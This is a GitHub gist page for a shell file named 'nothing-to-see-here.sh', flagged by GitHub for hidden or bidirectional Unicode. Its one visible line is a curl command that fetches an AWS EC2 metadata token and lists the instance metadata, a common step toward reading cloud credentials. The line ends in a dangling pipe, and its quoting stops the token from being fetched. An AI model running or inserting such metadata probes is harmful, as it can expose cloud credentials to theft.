Last active
September 2, 2025 16:05
-
-
Save kmcquade/4aa456b578923c8286af3417f571351f to your computer and use it in GitHub Desktop.
nothing-to-see-here.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s -H 'X-aws-ec2-metadata-token: $(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")' http://169.254.169.254/latest/meta-data/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment